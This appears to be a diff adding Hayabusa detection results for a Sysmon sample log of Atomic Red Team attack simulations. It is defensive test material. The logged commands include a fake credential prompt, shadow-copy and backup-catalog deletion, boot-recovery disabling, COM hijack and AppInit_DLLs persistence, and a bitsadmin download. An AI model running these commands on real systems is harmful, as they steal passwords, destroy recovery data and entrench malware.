+2019-07-19 23:46:20.767 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\(Default): mscoree.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.775 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\ThreadingModel: Both | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.787 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.802 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.817 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.824 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.830 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.841 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.858 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4256 | PGUID: 747F3D96-D7DB-5D31-0000-001089A52A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | LID: 0x50951 | PID: 4452 | PGUID: 747F3D96-D7DB-5D31-0000-0010B5A82A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence or CredAccess - Lsa NotificationPackge | SetValue: HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages: Binary Data | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentControlSet Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3968 | PGUID: 747F3D96-D809-5D31-0000-00100A242B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | LID: 0x50951 | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - AppInit | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs: C:\Tools\MessageBox64.dll,C:\Tools\MessageBox32.dll | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,New DLL Added to AppInit_DLLs Registry Key,,../hayabusa-rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Windows Load | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D809-5D31-0000-001072292B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D80C-5D31-0000-0010223C2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe delete shadows /all /quiet | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | LID: 0x50951 | PID: 1124 | PGUID: 747F3D96-D80C-5D31-0000-0010843F2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1348 | PGUID: 747F3D96-D80C-5D31-0000-001005542B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4500 | PGUID: 747F3D96-D811-5D31-0000-001000632B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wbadmin.exe delete catalog -quiet | Process: C:\Windows\System32\wbadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | LID: 0x50951 | PID: 6160 | PGUID: 747F3D96-D811-5D31-0000-001061652B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wbengine.exe"" | Process: C:\Windows\System32\wbengine.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\vds.exe | Process: C:\Windows\System32\vds.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3184 | PGUID: 747F3D96-D811-5D31-0000-0010147C2B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2948 | PGUID: 747F3D96-D812-5D31-0000-0010AC892B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:46.302 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\wbengine.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00 | Hash: SHA1=BE65E71FC691867FFA1D3129CEAB67A0688A08CB,MD5=9A0C13D674AB2D72193653EF38D8FB8E,SHA256=15817A5CB717D4846AE753A27CD8859BCE63004143083027FA5EC9324DFC5188,IMPHASH=5694D579C32F1A7EB5FA54148C174C38",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-D817-5D31-0000-001064AD2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D817-5D31-0000-001097B02B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6216 | PGUID: 747F3D96-D817-5D31-0000-001049B42B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} recoveryenabled no | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D817-5D31-0000-0010B7B62B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D817-5D31-0000-0010C8BA2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1632 | PGUID: 747F3D96-D81D-5D31-0000-0010B8CA2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7080 | PGUID: 747F3D96-D81D-5D31-0000-0010D7CD2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6736 | PGUID: 747F3D96-D824-5D31-0000-001023F42B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 1540 | PGUID: 747F3D96-D824-5D31-0000-001075F62B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5808 | PGUID: 747F3D96-D825-5D31-0000-0010CF222C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
